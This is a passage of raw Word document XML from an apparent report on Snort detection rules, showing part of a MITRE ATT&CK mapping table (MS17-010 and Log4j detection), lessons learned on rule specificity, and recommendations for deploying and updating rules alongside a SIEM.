            <w:r>
              <w:t>SMB/Windows Admin Shares</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB">
            <w:r>
              <w:t>MS17-010 exploit detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE52FB" w:rsidTr="00DE52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52FB" w:rsidRDefault="00DE52FB">
            <w:r>
              <w:t>T1190</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB">
            <w:r>
              <w:t>Exploit Public-Facing Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB">
            <w:r>
              <w:t>Log4j exploit detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>4. Lessons Learned</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Rule </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>specificity</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is key — overly broad rules cause false positives.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Signature-based detection is effective for known threats but </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>must be combined</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with anomaly detection for unknown threats.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>External rules (community/professional) accelerate deployment against newly disclosed vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>5. Containment Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Integrate created rules into live Snort deployments for proactive monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Keep rules updated from official and community repositories.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Combine Snort with SIEM for correlation and long-term IOC tracking.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="002D62F1" w:rsidRDefault="0023250F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AD65156" wp14:editId="5B74DAA2">
            <wp:extent cx="5943600" cy="2476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52FB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E0B15D0" wp14:editId="0CB88BF8">
            <wp:extent cx="5943600" cy="28435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52FB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05A9490A" wp14:editId="6F614FB9">
            <wp:extent cx="5943600" cy="35420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6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916C5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="503C7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971889"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0E3C7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5E7078"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DCAC2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FD75A0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AC860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8F5552"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0AF6E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D95356"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AD727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BC4D82"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="948C4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69625D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ABC06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0C13AE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4C664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6"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="3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50F"/>
    <w:rsid w:val="0023250F"/>
    <w:rsid w:val="002D62F1"/>
    <w:rsid w:val="00DE5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C5303"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1DE57738-6E29-48AB-875F-C35B91CBF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E52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52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52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2F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52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52F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DE52F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E52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52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52F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E52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5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5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1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32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12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8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3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2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28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6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80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Inam Qadeer</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Inam Qadeer</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-06T10:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-06T13:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>